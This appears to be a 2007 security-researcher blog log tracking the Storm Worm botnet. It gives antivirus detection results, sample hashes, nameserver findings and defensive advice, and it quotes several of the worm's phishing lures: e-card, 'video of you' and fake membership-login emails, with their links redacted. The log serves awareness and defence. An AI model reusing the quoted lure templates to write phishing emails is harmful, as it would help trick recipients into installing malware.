eTrust-Vet	31.1.5100	2007.08.31	Win32/Pecoan
Ewido	4.0	2007.09.01	-
FileAdvisor	1	2007.09.01	-
Fortinet	3.11.0.0	2007.09.01	W32/Tibs@mm
F-Prot	4.3.2.48	2007.08.31	W32/Tibs.XB
F-Secure	6.70.13030.0	2007.08.31	Email-Worm.Win32.Zhelatin.hj
Ikarus	T3.1.1.12	2007.09.01	Backdoor.Win32.Agent.amd
Kaspersky	4.0.2.24	2007.09.01	Email-Worm.Win32.Zhelatin.hj
McAfee	5110	2007.08.31	W32/Nuwar@MM
Microsoft	1.2803	2007.09.01	-
NOD32v2	2495	2007.09.01	-
Norman	5.80.02	2007.08.31	W32/Tibs.dam
Panda	9.0.0.4	2007.09.01	Trj/Alanchum.MV
Prevx1	V2	2007.09.01	-
Rising	19.38.52.00	2007.09.01	Worm.Mail.Win32.Zhelatin.dau
Sophos	4.21.0	2007.09.01	W32/Bagz-I
Sunbelt	2.2.907.0	2007.08.31	Trojan-Downloader.Win32.Tibs.jy
Symantec	10	2007.09.01	Trojan Horse
TheHacker	6.1.9.175	2007.08.31	W32/Zhelatin.hj
VBA32	3.12.2.3	2007.09.01	Email-Worm.Win32.Zhelatin.hj
VirusBuster	4.3.26:9	2007.09.01	I-Worm.Zhelatin.AA
Webwasher-Gateway	6.0.1	2007.08.31	Worm.Zhelatin.HJ
Additional information
File size: 138240 bytes
MD5: c05893a656b54164fb486028309bd89e
SHA1: 8ad506547710d61a6ac0613fdb1d290911f8e600

(Virustotal Results, http://www.virustotal.com)

As you can see, a select few still miss it, so please be careful clicking on those links in email or blog posts!


UPDATE: A closer look at our binaries over the last few days shows that we're still getting random binaries, but only a couple hundred a day, instead of several thousand. By far the most common binary appears to be c05893a656b54164fb486028309bd89e.

Targeted Storm

This morning I woke up to half a dozen targeted Storm Greetings in my mailbox. They looked like this:

Movie-quality postcard for (My Email Account Name)

Class mate(yexnjcegftuory@mittromney.com) has created Movie-quality postcard for you (My Email Account Name)
at lavacards.com.

To see your custom Movie-quality postcard, simply click on the following link:

http://xxx.xxx.xxx.xxx/

Send a FREE greeting card from lavacards.com whenever you want by visiting us at:
This service is provided and hosted by lavacards.com.

These are the first to include the account name used in the email. People may believe the authenticity of these emails because they do appear more targeted.

Dude, what if your wife finds this?!

The latest storm run is now using http and fake urls.

This is actually good news for us, because most spam filters will catch it. Turning off 'html display' in your email client will help you identify tricks like this:

Subject: Dude, what if your wife finds this?

From: <laura@trisection.com>Content-Type: text/html;charset=windows-1252
Content-Transfer-Encoding: 7BIT
Message-Id: <1IP0UT-000TG6-8G@wfvy>Sender: User guzjxoepu <guzjxoepu@wfvy>Date: Sun, 26 Aug 2007 03:36:09 +0900

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"><html><body>OMG, what are you doing man. This video of you is all over the net. take a look, lol... <a
href=\"http://xx.xx.x.xxx/\">http://www.youtube.com/watch?v=12xM6esvMXs</a></body></html>


The latest run uses video.exe and displays a static Youtube logo. All ecard.exe, msdataaccess.exe and applet.exe requests will result in a 404 error.

In other news:

We are now submitting our Stormworm IP feeds to Bleeding Edge Threats, and Comcast Communications as well as various private mailing lists and a law enforcement group.

We have captured over 25,000 unique malicious files related to this malware.

Other ISPs are starting to respond to our notifications.

US Cert has issued the following notice:

US-CERT is aware of several new propagation techniques being used by the Storm Worm Trojan to spread. The new variants arrive as either an email message claiming to contain a link to adult pictures, or as credentials for a membership-based website, asking you to login to change your temporary ID and password. The messages contain links to malicious websites that when visited, install malware on the user's system.

US-CERT urges users and administrators to take the following preventative measures to mitigate the security risks:

* Do not follow unsolicited links.
* Configure your web browser as described in the Securing Your Web Browser document.
* Install anti-virus software, and keep its virus signature files up-to-date.
* Refer to the Recognizing and Avoiding Email Scams document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.

UPDATE: Sans ISC Post

Stormworm/Peed/Peacom changing templates (again...)

The storm authors must be putting in as much time changing their routine as I am monitoring them.

A few dozen versions of this were in my email box. Thankfully these aren't targeted..yet. That will give me time to update all those security awareness emails.

Welcome,

Here is your membership info for Online Gamers.

Membership Number: 76245793978563
Your Temp. Login ID: user1043
Temorary Password: pu345

Your temporary Login Info will expire in 24 hours. Please login and change it.

Use this link to change your Login info: http://66.107.xx.xxx/

Thank You,
Confirmation Dept.
Online Gamers

Quick Storm Update

We're seeing an increase in storm spam, one spam drop has received over 200 messages in the last 24 hours.

Most are targeted, and many look like they are trying to pass themselves off as casual messages, not just greeting cards.

All the storm infected systems we've visited recently are serving up the new Microsoft Data Access page. If you see this page please close your the browser immediately!

We've updated our stats, click on the links in previous posts for the updated lists of over 18000 unique MD5's, 11,000 unique IPs, 486 name servers, and 418 open resolvers.

The tushove.com domain has been suspended, but 12 others still remain.

Stormworm filename change.

We've seen a few reports of a new ecard, the latest:

Worshipper(funfrog@rehau.com) has created Funny ecard for you
at postcards.org.

To see your custom Funny ecard, simply click on the following link:

http://xx.xx0.60.111/

Send a FREE greeting card from postcards.org whenever you want by visiting us at:
This service is provided and hosted by postcards.org.

when visiting the url, you're greeted with:

To view your ecard, you need to have Microsoft Data Access installed on your computer.

Of course you can click and install "Microsoft Data Access", which is also named msdataaccess.exe. Its trojaned, and joins the storm network.

Storm/Peed email template change

The storm authors have slightly altered their egreeting template, the most recent looks like this:

Family member has created a postcard for you at postcards.com,
the Internet's most popular greeting card service.

Your greeting card ID is: (HEX STRING)

To see your custom greeting card, simply click on the link below:
http://xx.xx.xxx.xxx/?(HEX STRING FROM ABOVE)

Send greeting cards from postcards.com whenever you want by visiting us at:
http://postcards.com/
Copyright (c) 1996-2007 postcards.com All Rights Reserved

The postcard.com links are valid pointers.

Paul got this one over the weekend:

Neighbour(secretariaat.antwer ...@libertysurf.fr) has created Animated postcard for you
at yourgreeting.com.

To see your custom Animated postcard, simply click on the following
Internet address (if your mail program doesn't support this feature
you will need to COPY and PASTE the address into your browser's address box):

http://xxx.xxx.xxx.xxx/?089c03307ff04a3fcb36edbf088
Send a FREE greeting card from yourgreeting.com whenever you want by visiting us at:
http://yourgreeting.com/
This service is provided and hosted by yourgreeting.com.

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm Nameservers. 364 of the identified nameservers are now functioning as open resolvers.

It is likely the storm gang may be preparing poisoned name servers operating behind network perimeters. If they did that they could use network sensitive IPs in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh Grandecom changed the DHCP provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN, and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL Certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (tcp/udp), and outbound port 25 (tcp) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.